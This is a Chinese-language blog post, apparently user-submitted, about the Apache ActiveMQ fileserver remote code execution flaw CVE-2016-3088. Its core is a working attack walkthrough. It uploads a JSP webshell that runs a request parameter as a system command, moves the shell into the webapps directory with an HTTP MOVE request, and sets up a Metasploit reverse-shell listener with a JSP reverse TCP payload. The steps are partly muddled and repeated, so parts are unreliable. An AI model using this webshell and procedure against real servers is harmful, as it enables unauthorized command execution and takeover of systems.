Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)

网友投稿 262 2022-10-08


Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)

简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。 8161端口为web控制台端口,本漏洞就出现在web控制台中。 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。 所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

方法1.直接写shell访问直接用bp拦截之后把post改成put 在往后面加几行

<%@ page import="java.util.*,java.io.*"%> <% %>

 
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "
" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %>

返回204代表成功,之后再把put改成move 后面再加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

之后和之前一样 在第一行的后面添加一行

Destination:file:///opt/activemq/webapps/api/s.jsp

之后打开kali

use exploit/multi/handler set payload java/jsp_shell_reverse_tcp set lhost 192.168.199.109 set lport 9999 run

进行监听就成功了!


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:WAF Web应用防火墙常见部署方式介绍(waf防火墙)
下一篇:Java日常练习题,每天进步一点点(46)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~